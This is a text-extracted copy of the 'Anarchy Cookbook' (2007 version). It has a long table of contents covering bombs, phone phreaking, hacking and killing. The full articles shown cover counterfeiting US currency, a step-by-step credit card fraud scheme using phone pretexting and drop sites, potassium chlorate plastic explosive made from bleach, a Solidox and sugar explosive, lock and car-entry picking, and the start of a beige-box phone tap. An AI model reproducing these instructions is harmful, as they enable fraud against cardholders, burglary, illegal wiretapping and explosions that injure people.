You are on page 1of 628

ANARCHYCOOKBOOKVERSION2007 TableofContents 1. CounterfeitingMoney 2. CreditCardFraud 3. MakingPlasticExplosives 4. PickingMasterLocks 5. TheArtsofLockpickingI 6. TheArtsofLockpickingII 7. SolidoxBombs 8. HighTechRevenge:TheBeigebox 9. COBombs 10. ThermiteIIBombs 11.

TouchExplosives 12. LetterBombs 13. PaintBombs 14. WaystosendacartoHELL 15. Doyouhateschool? 16. Phonerelatedvandalism 17. Highwaypoliceradarjamming 18. SmokeBombs 19. MailBoxBombs 20. Hotwiringcars 21. Napalm 22. FertilizerBomb 23. TennisBallBomb 24. DisketteBombs 25. UnlistedPhoneNumbers 26. Fuses 27. HowtomakePotassiumNitrate 28. ExplodingLightbulbs 29. Underwaterigniters 30. Homebrewblastcannon 31. ChemicalEquivalencyList 32. PhoneTaps 33. Landmines 34. AdifferentMolitovCocktail 35. PhoneSystemsTutorialI 36. PhoneSystemsTutorialII 37. BasicAllianceTeleconferencing 38. AquaBoxPlans 39. HindenbergBomb 40. HowtoKillSomeone 41. PhoneSystemsTutorialIII 42. BlackBoxPlans 43. TheBlottoBox 44. Blowgun 45. BrownBoxPlans 46. CalciumCarbideBomb 47. MoreWaystoSendaCartoHell 48. RippingoffChangeMachines 49. ClearBoxPlans 50. CNANumberListing 51. ElectronicTerrorism 52. StartaConf.w/o2600hzorMF 53. Dynamite 54. AutoExhaustFlameThrower 55. HowtoBreakintoBBsExpress 56. Firebomb 57. FuseBomb 58. GenericBomb 59. GreenBoxPlans

60. 61. 62. 63. 64. 65. 66. 67. 68. 69. 70. 71. 72. 73. 74. 75. 76. 77. 78. 79. 80. 81. 82. 83. 84. 85. 86. 87. 88. 89. 90. 91. 92. 93. 94. 95. 96. 97. 98. 99. 100. 101. 102. 103. 104. 105. 106. 107. 108. 109. 110. 111. 112. 113. 114. 115. 116. 117. 118. 119. 120. 121.

PortableGrenadeLauncher BasicHackingTutorialI BasicHackingTutorialII HackingDEC's HarmlessBombs BreakingintoHouses Hypnotism RemoteInformerIssue#1 JackpottingATMMachines JugBomb FunatKMart MaceSubstitute HowtoGrowMarijuana MatchHeadBomb TerrorizingMcDonalds "Mentor's"LastWords TheMythofthe2600hzDetector BlueBoxPlans NapalmII NitroglycerinRecipe Operation:Fuckup StealingCallsfromPayphones PoolFun FreePostage UnstableExplosives WeirdDrugs TheArtofCarding RecognizingCreditCards HowtoGetaNewIdentity RemoteInformerIssue#2 RemoteInformerIssue#3 RemoteInformerIssue#4 RemoteInformerIssue#5 Phreaker'sGuidetoLoopLines MaBellTutorial GettingMoneyoutofPayPhones ComputerbasedPBX PCPursuitPortStatistics PearlBoxPlans ThePhreakFile RedBoxPlans RemObS ScarletBoxPlans SilverBoxPlans BellTrashing CanadianWATSPhonebook HackingTRW HackingVAX&UNIX VerificationCircuits WhiteBoxPlans TheBLASTBox DealingwiththeR&ROperator CellularPhonePhreaking CheeseboxPlans StartYourOwnConferences GoldBoxPlans TheHistoryofESS TheLunchBox OliveBoxPlans TheTronBox MoreTRWInfo "Phreaker'sPhunhouse"

122. 123. 124. 125. 126. 127. 128. 129. 130. 131. 132. 133. 134. 135. 136. 137. 138. 139. 140. 141. 142. 143. 144. 145. 146. 147. 148. 149. 150. 151. 152. 153. 154. 155. 156. 157. 158. 159. 160. 161. 162. 163. 164. 165. 166. 167. 168. 169. 170. 171. 172. 173. 174. 175. 176. 177. 178. 179. 180. 181. 182. 183.

PhrackMagazineVol.3,Issue27 PhrackMagazineVol.3,Issue27 PhrackMagazineVol.3,Issue28 PhrackMagazineVol.3,Issue28 PhrackMagazineVol.3,Issue28 PhrackMagazineVol.3,Issue30 PhrackMagazineVol.3,Issue30 PhrackMagazineVol.3,Issue30 SodiumChlorate MercuryFulminate ImprovisedBlackPowder NitricAcid DustBombInstructions CarbonTetExplosive MakingPicricAcidfromAspirin ReclamationofRDXfromC4 EggbasedGelledFlameFuels ClothespinSwitch FlexiblePlateSwitch LowSignatureSystem[Silencers] DelayIgniterFromCigarette Nicotine DriedSeedTimer NailGrenade BellGlossary PhoneDialLocksBeat'em ExchangeScanning AShortHistoryofPhreaking "SecretsoftheLittleBlueBox" TheHistoryofBritishPhreaking "BadasShit" Telenet FuckingwiththeOperator PhrackMagazineVol.1,Issue1 InternationalCountryCodesList InfinityTransmitterPlans LSD Bananas YummyMarihuanaRecipes Peanuts ChemicalFireBottle IgniterfromBookMatches "RedorWhitePowder"Propellant PipeHandGrenade EuropeanCreditCardFraud PotassiumBomb YourLegalRights JuvenileOffenders'Rights DownTheRoadMissle FunWithShotgunShells SurveillanceEquipment DripTimer Stealing Miscellaneous Shavingcreambomb RippingoffchangemachinesII LockpickingtheEASYway Anarchy'N'ExplosivesPrelude Anarchy'N'ExplosivesVol.1 Anarchy'N'ExplosivesVol.2 Anarchy'N'ExplosivesVol.3 Anarchy'N'ExplosivesVol.4

184. 185. 186. 187. 188. 189. 190. 191. 192. 193. 194. 195. 196. 197. 198. 199. 200. 201. 202. 203. 204. 205. 206. 207. 208. 209. 210. 211. 212. 213. 214. 215. 216. 217. 218. 219.

Anarchy'N'ExplosivesVol.5 ExplosivesandPropellants LockpickingIII ChemicalEquivalentListII NitroglycerinII CelluloseNitrate StarterExplosives FlashPowder ExplodingPens RevisedPipeBombs *SAFETY*AMUSTREAD! AmmoniumTriIodide SulfuricAcid&Amm.NitrateIII BlackPowderIII Nitrocellulose RDX TheBlackGateBBS ANFOS PicricAcidII BottledExplosives DryIce Fuses/Ignitors/Delays FilmCanisterBombs BookBombs PhoneBombs SpecialAmmunition Rocketry PipeCannonII SmokeBombs Firecrackers SuppliersII LabRaidChecklist MiscAnarchy ComboLocksII MiscAnarchyII ThermiteIV

1.CounterfeitingMoneybyTheJollyRoger Beforereadingthisarticle,itwouldbeaverygoodideatogetabookonphoto offsetprinting,forthisisthemethodusedincounterfeitingUScurrency.If youarefamiliarwiththismethodofprinting,counterfeitingshouldbeasimple taskforyou. Genuinecurrencyismadebyaprocesscalled"gravure",whichinvolvesetchinga metalblock.Sinceetchingametalblockisimpossibletodobyhand,photo offsetprintingcomesintotheprocess. Photooffsetprintingstartsbymakingnegativesofthecurrencywithacamera, andputtingthenegativesonapieceofmaskingmaterial(usuallyorangein color).Thestrippednegatives,commonlycalled"flats",arethenexposedtoa lithographicplatewithanarclightplatemaker.Theburnedplatesarethen

developedwiththeproperdevelopingchemical.Oneatatime,theseplatesare wrappedaroundtheplatecylinderofthepress. Thepresstouseshouldbean11by14offset,suchastheABDick360.Make2 negativesoftheportraitsideofthebill,and1ofthebackside.After developingthemandlettingthemdry,takethemtoalighttable.Usingopaque ononeoftheportraitsides,touchoutallthegreen,whichisthesealandthe serialnumbers.Thebacksidedoesnotrequireanyretouching,becauseitisall onecolor.Now,makesureallofthenegativesareregistered(linedup correctly)ontheflats.Bytheway,everytimeyouneedanotherserialnumber, shoot1negativeoftheportraitside,cutouttheserialnumber,andremovethe oldserialnumberfromtheflatreplacingitwiththenewone. Nowyouhaveall3flats,andeachrepresentsadifferentcolor:black,and2 shadesofgreen(thetwoshadesofgreenarecreatedbymixinginks).Nowyou arereadytoburntheplates.Takealithographicplateandetchthreemarkson it.Thesemarksmustbe2and9/16inchesapart,startingononeoftheshort edges.Dothesamethingto2moreplates.Then,take1oftheflatsandplace itontheplate,exactlyliningtheshortedgeupwiththeedgeoftheplate. Burnit,moveituptothenextmark,andcoveruptheexposedareayouhave alreadyburned.Burnthat,anddothesamething2moretimes,movingtheflat uponemoremark.Dothesameprocesswiththeother2flats(eachonaseparate plate).Developallthreeplates.Youshouldnowhave4imagesoneachplate withanequalspacebetweeneachbill. Thepaperyouwillneedwillnotmatchexactly,butitwilldoformost situations.Thepapertouseshouldhavea25%ragcontent.Bytheway,Disaperf computerpaper(invisibleperforation)doesthejobwell.Takethepaperand loaditintothepress.Besuretosettheair,buckle,andpaperthickness right.Startwiththeblackplate(theplatewithouttheserialnumbers).Wrap itaroundthecylinderandloadblackinkin.Makesureyourunmorethanyou needbecausetherewillbealotofrejects.Then,whilethatisprinting,mix theinksfortheserialnumbersandthebackside.Youwillneedtoaddsome whiteandmaybeyellowtotheserialnumberink.Youalsoneedtoaddblackto thebackside.Experimentuntilyougetitright.Now,cleanthepressandprint theotherside.Youwillnowhaveabillwithnogreensealorserialnumbers. Printafewwithoneserialnumber,makeanotherandrepeat.Keepdoingthis untilyouhaveasmanydifferentnumbersasyouwant.Thencutthebillstothe exactsizewithapapercutter.Youshouldhaveprintedalargeamountofmoney bynow,butthereisstilloneproblem;thepaperispurewhite.Todyeit,mix thefollowinginapan:2cupsofhotwater,4teabags,andabout16to20 dropsofgreenfoodcoloring(experimentwiththis).Diponeofthebillsinand compareittoagenuineUSbill.Makethenecessaryadjustments,anddyeallthe bills.Also,itisagoodideatomakethemlookused.Forexample,wrinkle them,rubcoffeegrindsonthem,etc. Asbeforementioned,unlessyouarefamiliarwithphotooffsetprinting,mostof theinformationinthisarticlewillbefairlyhardtounderstand.Alongwith gettingabookonphotooffsetprinting,trytoseethemovie"ToLiveandDie inLA".Itisaboutacounterfeiter,andtheproducerdoesaprettygoodjobof showinghowtocounterfeit.Agoodbookonthesubjectis"ThePoorMan'sJames Bond". Ifallofthisseemstoocomplicatedtoyou,thereisoneothermethodavailable forcounterfeiting:TheCanoncolorlasercopier.TheCanoncanreplicate ANYTHINGinvibrantcolor,includingUScurrency.But,onceagain,themain problemincounterfeitingisthepaperused.So,experiment,andgoodluck! 2.CreditCardFraudbyTheJollyRoger Formostofyououtthere,moneyishardtocomeby.Untilnow:

Withtherecentadventofplasticmoney(creditcards),itiseasytouse someoneelse'screditcardtoordertheitemsyouhavealwaysdesiredinlife. Thestakesarehigh,butthepayoffisworthit. StepOne:Gettingthecreditcardinformation Firstoff,youmustobtainthecrucialitem:someone'screditcardnumber.The bestwaytogetcreditcardnumbersistotakethebluecarbonsusedinacredit cardtransactionatyourlocaldepartmentstore.Thesecanusuallybefoundin thegarbagecannexttotheregister,orforthemoredaring,inthegarbage dumpsterbehindthestore.But,duetothelargeamountofcreditcardfraud, manystoreshaveoptedtouseacarbonlesstransactionsheet,makingthingsmuch moredifficult.Thisiswhereyourphonecomesinhandy. First,lookupsomeoneinthephonebook,andobtainasmuchinformationas possibleaboutthem.Then,duringbusinesshours,callinaveryconvincing voice"Hello,thisisJohnDoefromtheVisaCreditCardFraudInvestigations Department.Wehavebeeninformedthatyourcreditcardmayhavebeenusedfor fraudulentpurposes,sowillyoupleasereadoffthenumbersappearingonyour Visacardforverification."Ofcourse,useyourimagination!Believeitornot, manypeoplewillfallforthisployandgiveouttheircreditinformation. Now,assumingthatyouhaveyourvictim'screditcardnumber,youshouldbeable todeciphertheinformationgiven. StepTwo:Recognizinginformationfromcarboncopies Cardexample: [AmericanExpress] XXXXXXXXXXXXXXX MM/Y1THRUMM/Y2 JOESHMOE Explanation: MM/Y1isthedatethecardwasissued,andMM/Y2istheexpirationdate.The AmericanExpressGoldCardhasnumbersXXXXXXXXXXXXXXXXXXXXXX,andiscovered forupto$5000.00,evenifthecardholderisbroke. [Mastercard] 5XXXXXXXXXXXXXXX XXXXAAADDMMYYMM/YY JOESHMOE Explanation: XXXXinthesecondrowmaybeaskedforduringtheorderingprocess.Thefirst dateiswhenthecardwasnew,andthesecondiswhenthecardexpires.Themost frequentnumbercombinationusedis54241800XXXXXXXX.Therearemanyofthese cardsincirculation,butmanyoftheseareonwantedlists,socheckthese first. [Visa] 4XXXXXX(X)XXX(X)XXX(X) MM/YYMM/YY*VISA JOESHMOE Explanation: Visaisthemostabundantcard,andisacceptedalmosteverywhere.The"*VISA"

issometimesreplacedwith"BWG",orfollowedwithaspecialcode.Thesecodes areasfollows: [1]MM/YY*VISAVPreferredCard [2]MM/YY*VISACVClassicCard [3]MM/YY*VISAPVPremierCard PreferredCardsarebackedwithmoney,andaremuchsafertouse.ClassicCards arenewer,hardertoreproducecardswithdecentbacking.PremierCardsare ClassicCardswithPreferredcoverage.Commonnumbersare4448020XXXXXX,4254 51236000XXXX,and425451238500XXXX.Any47121250XXXXXXXXcardsareIBM CreditUnioncards,andareriskytouse,althoughtheyareusuallycoveredfor largepurchases. StepThree:Testingcredit YoushouldnowhaveaVisa,Mastercard,orAmericanExpresscreditcardnumber, withthevictim'saddress,zipcode,andphonenumber.Bytheway,ifyouhave problemsgettingtheaddress,mostphonecompaniesoffertheAddressTracking Service,whichisaspecialnumberyoucallthatwillgiveyouanaddressfroma phonenumber,atanominalcharge.Nowyouneedtocheckthebalanceofcredit onthecreditcard(tomakesureyoudon'trunoutofmoney),andyoumustalso makesurethatthecardisn'tstolen.Todothisyoumustobtainaphonenumber thatbusinessesusetocheckoutcreditcardsduringpurchases.Ifyougotoa departmentstore,watchthecashierwhensomeonemakesacreditcardpurchase. He/shewillusuallycallaphonenumber,givethecreditinformation,andthen givewhatiscalleda"MerchantNumber".Thesenumbersareusuallywrittendown onoraroundtheregister.Itiseasytoeitherfindthesenumbersandcopy them,ortowaituntiltheycallonein.Watchwhattheydialandwaitforthe8 digit(usually)merchantnumber.Onceyoucallthenumber,inacalmvoice,read offtheaccountnumber,merchantnumber,amount,andexpirationdate.Thecredit bureauwilltellyouifitisOK,andwillgiveyouanauthorizationnumber. Pretendyouarewritingthisnumberdown,andrepeatitbacktothemtocheck it.Ignorethisnumbercompletely,foritservesnorealpurpose.However,once youdothis,thebankremovesdollarsequaltowhatyoutoldthem,becausethe cardwassupposedlyusedtomakeapurchase.Sometimesyoucantrickthe operatorbytellingherthecustomerchangedhismindanddecidednottocharge it.Ofcourse,somewillnotallowthis.Rememberatalltimesthatyouare supposedtobeastoreclerkcallingtocheckoutthecardforapurchase.Act likeyouaretalkingwithacustomerwhenhe/she"cancels". StepFour:Thedrop Oncethecardsarecleared,youmustfindaplacetohavethepackagesent. NEVERuseadropmorethanonce.Thefollowingaretypicaldropsites: [1]Anemptyhouse Anemptyhousemakesanexcellentplacetosendthings.SendthepackageUPS, andleaveanoteonthedoorsaying,"UPS.Iworkdays,8to6.Couldyouplease leavethepackageonthebackdoorstep?"Youcanfinddozensofhousesfroma realestateagentbytellingthemyouwanttolookaroundforahouse.Askfora listoftwentyhousesforsale,andtellthemyouwillcheckoutthearea.Do so,untilyoufindonethatsuitsyourneeds. [2]RentASpot UHaulsometimesrentsspaceswhereyoucanhavepackagessentandsignedfor. Endyourspacewhenthepackagearrives. [3]People'shouses

Findsomeoneyoudonotknow,andhavethepackagesentthere.Callaheadsaying that"Icalledthestoreandtheysentthepackagetothewrongaddress.Itwas alreadysent,butcanyoukeepitthereforme?"Thisisaveryreliablewayif youkeepcalmwhentalkingtothepeople. DoNOTtrypostofficeboxes.Mostofthetime,UPSwillnotdelivertoapost officebox,andmanypeoplehavebeencaughtinthepastattemptingtousea postofficebox.Also,whenyouhavedeterminedadropsite,keepaneyeonit forsuspiciouscharactersandcarsthathavenotbeentherebefore. StepFive:Makingthetransaction Youshouldnowhaveareliablecreditcardnumberwithallthenecessarybilling information,andagooddropsite. Thebestplacetoorderfromiscatalogues,andmailorderhouses.Itisinyour bestinteresttoplacethephonecallfromapayphone,especiallyifitisa1 800number.Now,whenyoucall,don'ttrytodisguiseyourvoice,thinkingyou willtrickthesalespersonintobelievingyouareanadult.Thesefolksare trainedtodetectthis,soyourbestbetistoorderinyourownvoice.They willaskforthefollowing:name,nameasitappearsoncard,phonenumber, billingaddress,expirationdate,methodofshipping,andproduct.Askifthey offerUPSRedshipping(nextdayarrival),becauseitgivesthemlesstimeto researchanorder.IfyouareusingAmericanExpress,youmighthaveabitofa problemshippingtoanaddressotherthanthebillingaddress.Also,ifthe salespersonstartstoaskquestions,doNOThangup.Simplytalkyourwayoutof thesituation,soyouwon'tencourageinvestigationontheorder. Ifeverythinggoesright,youshouldhavetheproduct,freeofcharge.Insurance picksupthetab,andnooneisanywiser.Becareful,andtrynottoorder anythingover$500.Insomestates,UPSrequiresasignatureforanythingover $200,nottomentionthatanythingover$200isdefinedasgrandtheft,aswell ascreditfraud.Getcaughtdoingthis,andyouwillbiteitforacoupleof years.Goodluck! 3.MakingPlasticExplosivesfromBleachbyTheJollyRoger Potassiumchlorateisanextremelyvolatileexplosivecompound,andhasbeen usedinthepastasthemainexplosivefilleringrenades,landmines,and mortarroundsbysuchcountriesasFranceandGermany.Commonhouseholdbleach containsasmallamountofpotassiumchlorate,whichcanbeextractedbythe procedurethatfollows. Firstoff,youmustobtain: 1. Aheatsource(hotplate,stove,etc.) 2. Ahydrometer,orbatteryhydrometer 3. AlargePyrex,orenameledsteelcontainer(toweighchemicals) 4. Potassiumchloride(soldasasaltsubstituteathealthandnutrition stores) Takeonegallonofbleach,placeitinthecontainer,andbeginheatingit. Whilethissolutionheats,weighout63gramsofpotassiumchlorideandaddthis tothebleachbeingheated.Constantlycheckthesolutionbeingheatedwiththe hydrometer,andboiluntilyougetareadingof1.3.Ifusingabattery hydrometer,boiluntilyoureadaFULLcharge. Takethesolutionandallowittocoolinarefrigeratoruntilitisbetween roomtemperatureand0C.Filteroutthecrystalsthathaveformedandsave them.Boilthissolutionagainandcoolasbefore.Filterandsavethecrystals.

Takethecrystalsthathavebeensaved,andmixthemwithdistilledwaterinthe followingproportions:56gramsper100millilitersdistilledwater.Heatthis solutionuntilitboilsandallowtocool.Filterthesolutionandsavethe crystalsthatformuponcooling.Thisprocessofpurificationiscalled "fractionalcrystallization".Thesecrystalsshouldberelativelypurepotassium chlorate. Powderthesetotheconsistencyoffacepowder,andheatgentlytodriveoffall moisture. Now,meltfivepartsVaselinewithfivepartswax.Dissolvethisinwhite gasoline(campstovegasoline),andpourthisliquidon90partspotassium chlorate(thepowderedcrystalsfromabove)intoaplasticbowl.Kneadthis liquidintothepotassiumchlorateuntilintimatelymixed.Allowallgasolineto evaporate. Finally,placethisexplosiveintoacool,dryplace.Avoidfriction,sulfur, sulfides,andphosphorouscompounds.Thisexplosiveisbestmoldedtothe desiredshapeanddensityof1.3gramsinacubeanddippedinwaxuntilwater proof.Theseblocktypechargesguaranteethehighestdetonationvelocity.Also, ablastingcapofatleasta3grademustbeused. Thepresenceoftheaforementionedcompounds(sulfur,sulfides,etc.)results inmixturesthatareorcanbecomehighlysensitiveandwillpossiblydecompose explosivelywhileinstorage.Youshouldneverstorehomemadeexplosives,and youmustuseEXTREMEcautionatalltimeswhileperformingtheprocessesinthis article. Youmayobtainacatalogofothersubjectofthisnaturebywriting: InformationPublishingCo. Box10042 Odessa,Texas79762 4.PickingMasterLocksbyTheJollyRoger HaveyouevertriedtoimpresssomeonebypickingoneofthoseMaster combinationlocksandfailed? TheMasterlockcompanymadetheiroldercombinationlockswithaprotection scheme.Ifyoupullthehandletoohard,theknobwillnotturn.Thatwastheir biggestmistake. Thefirstnumber: GetoutanyoftheMasterlockssoyouknowwhatisgoingon.Whilepullingon theclasp(partthatspringsopenwhenyougetthecombinationright),turnthe knobtotheleftuntilitwillnotmoveanymore,andaddfivetothenumberyou reach.Younowhavethefirstnumberofthecombination. Thesecondnumber: Spinthedialaroundacoupleoftimes,thengotothefirstnumberyougot. Turnthedialtotheright,bypassingthefirstnumberonce.Whenyouhave bypassedthefirstnumber,startpullingontheclaspandturningtheknob.The knobwilleventuallyfallintothegrooveandlock.Whileinthegroove,pull theclaspandturntheknob.Iftheknobisloose,gotothenextgroove,ifthe knobisstiff,youhavethesecondnumberofthecombination. Thethirdnumber:

Aftergettingthesecondnumber,spinthedial,thenenterthetwonumbers. Slowlyspinthedialtotheright,andateachnumber,pullontheclasp.The lockwilleventuallyopenifyoudidtheprocessright. ThismethodofopeningMasterlocksonlyworksonoldermodels.Someoneinformed Masteroftheirmistake,andtheyemployedanewmechanismthatisfoolproof (fornow). 5.TheArtsofLockpickingIbyTheJollyRoger LockpickingI:Carsandassortedotherlocks Whilethebasicthemesoflockpickinganduninvitedentryhavenotchangedmuch inthelastfewyears,somemoderndevicesandtechniqueshaveappearedonthe scene. Automobiles: ManyolderautomobilescanstillbeopenedwithaSlimJimtypeofopener(these andotherautolocksmithingtechniquesarecoveredfullyinthebook"Inthe StilloftheNight",byJohnRussellIII);however,manycarmanufacturershave builtcasesoverthelockmechanism,orhavemovedthelockmechanismsothe SlimJimwillnotwork.So: AmericanLocksmithService P.O.Box26 CulverCity,CA90230 ALSoffersanewandimprovedSlimJimthatis30incheslongand3/4inches wide,soitwillbothreachandslipthroughthenewcarlockcovers(insidethe door).Priceis$5.75plus$2.00postageandhandling. CarsmanufacturedbyGeneralMotorshavealwaysbeenabanetopeoplewhoneeded toopenthem,becausethesidebarlockingunittheyemployisverydifficultto pick.Tofurthercomplicatematters,thenewGMcarsemploymetalshieldsto maketheuseofaSlimJimtypeinstrumentverydifficult.So: LockTechnologyCorporation 685MainSt. NewRochelle,NY10801 LTCoffersacutelittletoolwhichwilleasilyremovethelockcylinderwithout harmtothevehicle,andwillallowyoutoenterand/orstartthevehicle.The GMC40sellsfor$56.00plus$2.00forpostageandhandling. Thebestgeneralautomobileopeningkitisprobablyasetoflockouttools offeredby: SteckMFGCorporation 1319W.StewartSt. Dayton,OH45408 For$29.95onecanpurchaseacompletesetofsixcarbonlockouttoolsthatwill openmorethan95%ofallthecarsaround. Kwicksetlockshavebecomequitepopularasonestepsecuritylocksformany typesofbuildings.Theyareabithardertopickandofferahigherdegreeof securitythananormalbuilderinstalleddoorlock.So: AMFG 1151WallaceSt. Massilon,OH44646

Priceis$11.95.Kwicksetlockscanhandilybedisassembledandthedooropened withoutharmtoeitherthelockorthedoorbyusingtheabovementionedKwick Outtool. Ifyouaretoolazytopickautolocks: VeehofSupply Box361 StormLake,IO50588 VSsellstryoutkeysformostcars(tryoutkeysareusedsincethereisnoone masterkeyforanyonemakeofcar,buttherearegrouptypemasters(a.k.a. tryoutkeys).Pricesaverageabout$20.00aset. UpdatedLockpicking: Foryears,therehavebeenanumberofpickattackproceduresformostpinand tumblerlocksystems.Inreverseorderofeasetheyareasfollows: NormalPicking: Usingapicksettoalignthepins,onebyone,untiltheshearlineissetand thelockopens. Racking: Thismethodusespicksthatareconstructedwithaseriesofbumps,ordiamond shapenotches.Thesepicksare"raked"(i.e.runoverallthepinsatonetime). Withluck,thepinswillraiseintheopenpositionandstaythere.Raking,if successful,canbemuchlessofaneffortthanstandardpicking. LockAidGun: Thisgunshapeddevicewasinventedanumberofyearsagoandhasfound applicationwithmanylocksmithsandsecuritypersonnel.Basically,aneedle shapedpickisinsertedinthesnoutofthe"gun",andthe"trigger"ispulled. Thisactionsnapsthepickupanddownstrongly.Ifthetipisslippedunderthe pins,theywillalsobesnappedupanddownstrongly.Withabitofluckthey willstrikeeachotherandseparateattheshearlineforasplitsecond.When thishappensthelockwillopen.Thelockaidgunisnot100%successful,but whenitdoeswork,theresultsareverydramatic.Youcansometimesopenthe lockwithonesnapofthetrigger. Vibrator: Somecraftypeoplehavemountedaneedlepickintoanelectrictoothbrushpower unit.Thisvibratingeffectwillsometimesopenpintumblerlocksinstantly. Thereisnowanothermethodtoopenpinandwaferlocksinaveryshorttime. Althoughitresemblesatoothbrushpickinappearance,itisactuallyan electronicdevice.IamspeakingoftheCobrapickthatisdesignedandsoldby: FedCorporation P.O.Box569 Scottsdale,AR85252 TheCobrausestwoninevoltbatteries,teflonbearings(forlessnoise),anda camroller.Itcomeswiththreepicks(fordifferenttypesoflocks)andworks bothinAmericaandoverseas,onpinorwaferlocks.TheCobrawillopengroup onelocks(commondoorlocks)inthreetosevensecondswithnodamage,inthe handsofanexperiencedlocksmith.Itcantakeafewsecondsmoreoruptoa

halfaminuteforsomeonewithnoexperienceatall.Itwillalsoopengrouptwo locks(includinggovernment,highsecurity,andmedicos),althoughthiscantake ashorttimelonger.ItwillnotopenGMsidebarlocks,althoughadeviceis abouttobeintroducedtofillthatgap.Howmuchforthistoythatwillopen mostlocksinsevenseconds? $235.00plus$4.00shippingandhandling. Foryouhardcoresafecrackers,FCalsosellstheMI6thatwillopenmost safesatacostof$10,000forthethreewheelattackmodel,and$10,500forthe fourwheelmodel.Itcomesinasturdyaluminumcarryingcasewithmonitor,disk driveandsoftware. Ifnoneofthesesafeandsaneideasappealtoyou,youcanalwaysfallbackon themagicthermallance... Thethermallanceisarathercrudeinstrumentconstructedfrom3/8inchhollow magnesiumrods.Eachtubecomesina10footlength,butcanbecutdownif desired.Eachoneisthreadedononeend.Tousethelance,youscrewthetube togetherwithamattedregulator(likeaweldingoutfituses)andhookupan oxygentank.Thenoxygenisturnedonandtherodislitwithastandardwelding igniter.Thedeviceproducesanincredibleamountofheat.Itisusedfor cuttingupconcreteblocksorevenrocks.Anactivelancewillgothroughafoot ofsteelinafewseconds.Thelanceisalsoknownasaburningbar,andis availablefrom: C.O.L.MFG 7748W.Addison Chicago,IL60634 6.TheArtsofLockpickingIIbyTheJollyRoger Soyouwanttobeacriminal.Well,ifyouwanttobelikeJamesBondandopena lockinfifteenseconds,thengotoHollywood,becausethatistheonlyplace youareevergoingtodoit.Evenexperiencedlocksmithscanspendfivetoten minutesonalockiftheyareunlucky.Ifyouarewantingextremelyquick access,lookelsewhere.Thefollowinginstructionswillpertainmostlytothe "lockinknob"typelock,sinceitistheeasiesttopick. Firstofall,youneedapickset.Ifyouknowalocksmith,gethimtomakeyou aset.Thiswillbethebestpossiblesetforyoutouse.Ifyoufinda locksmithunwillingtosupplyaset,don'tgiveuphope.Itispossibletomake yourown,ifyouhaveaccesstoagrinder(youcanuseafile,butittakes forever). Thethingyouneedisanallenwrenchset(verysmall).Theseshouldbesmall enoughtofitintothekeyholeslot.Now,bendthelongendoftheallenwrench ataslightangle(not90).Now,takeyourpicktoagrinderorafile,and smooththeenduntilitisroundedsoitwon'thanginsidethelock.Testyour tooloutondoorknobsatyourhousetoseeifitwillslideinandoutsmoothly. Now,thisiswherethescrewdrivercomesin.Itmustbesmallenoughforitand yourpicktobeusedinthesamelockatthesametime,oneabovetheother.In thecominginstructions,pleaserefertothischartoftheinteriorofalock: ______________________________ \K ||||||/E ||||\Y[|]Uppertumblerpin ^^/H[^]Lowertumblerpin ^^^^^^\O[]Cylinderwall /L(Thisisagreatlysimplified \Edrawing) ______________________________/

Theobjectistopressthepinupsothatthespacebetweentheupperpinand thelowerpinislevelwiththecylinderwall.Now,ifyoupushapinup,it's tendencyistofallbackdown,right?Thatiswherethescrewdrivercomesin. Insertthescrewdriverintotheslotandturn.Thistensionwillkeepthe "solved"pinsfromfallingbackdown.Now,workfromthebackofthelocktothe front,andwhenyouarethrough,therewillbeaclick,thescrewdriverwill turnfreely,andthedoorwillopen. Donotgetdiscouragedonyourfirsttry!Itwillprobablytakeyouabouttwenty tothirtyminutesyourfirsttime.Afterthat,youwillquicklyimprovewith practice. 7.SolidoxBombsbyTheJollyRoger Mostpeoplearenotawarethatavolatile,extremelyexplosivechemicalcanbe boughtoverthecounter:Solidox. Solidoxcomesinanaluminumcancontaining6greysticks,andcanbeboughtat KMart,andvarioushardwaresupplyshopsforaround$7.00.Solidoxisusedin weldingapplicationsasanoxidizingagentforthehotflameneededtomelt metal.ThemostactiveingredientinSolidoxispotassiumchlorate,afiller usedinmanymilitaryapplicationsintheWWIIera. SinceSolidoxisliterallywhatthenamesays:SOLIDOXygen,youmusthavean energysourceforanexplosion.Themostcommonandreadilyavailableenergy sourceiscommonhouseholdsugar,orsucrose.Intheory,glucosewouldbethe purestenergysource,butitishardtofindasolidsupplyofglucose. Makingthemixture: 1. OpenthecanofSolidox,andremoveall6sticks.Onebyone,grindup eachofthesticks(preferablywithamortarandpestle)intothefinestpowder possible. 2. TheratioformixingthesugarwiththeSolidoxis1:1,soweighthe Solidoxpowder,andgrinduptheequivalentamountofsugar. 3. MixequivalentamountsofSolidoxpowder,andsugarina1:1ratio. Itisjustthatsimple!Younowhaveanextremelypowerfulsubstancethatcanbe usedinavarietyofapplications.Awordofcaution:beEXTREMELYcarefulin theentireprocess.Avoidfriction,heat,andflame.Afewyearsback,a teenagerIknewblew4fingersoffwhiletryingtomakeapipebombwith Solidox.Youhavebeenwarned! 8.HighTechRevenge:TheBeigeboxRev.2byTheJollyRoger I.Introduction Haveyoueverwantedalineman'shandset?Surelyeveryphreakhasatleastonce consideredthephunthathecouldhavewithone.Aftersearchingunlockedphone companytrucksformonths,wehadanidea.Wecouldbuildone.Wedid,andnamed itthe"BeigeBox"simplybecausethatisthecolorofours. Thebeigeboxissimplyaconsumerlineman'shandset,whichisaphonethatcan beattachedtotheoutsideofaperson'shouse.Tofabricateabeigebox,follow along. II.ConstructionandUse Theconstructionisverysimple.Firstyoumustunderstandtheconceptofthe device.Inamodularjack,therearefourwires.Thesearered,green,yellow, andblack.Forasinglelinetelephone,however,onlytwomatter:thered(ring) andgreen(tip).Theyellowandtheblackarenotnecessaryforthisproject.A lineman'shandsethastwoclipsonit:theringandthetip.Takeamodularjack

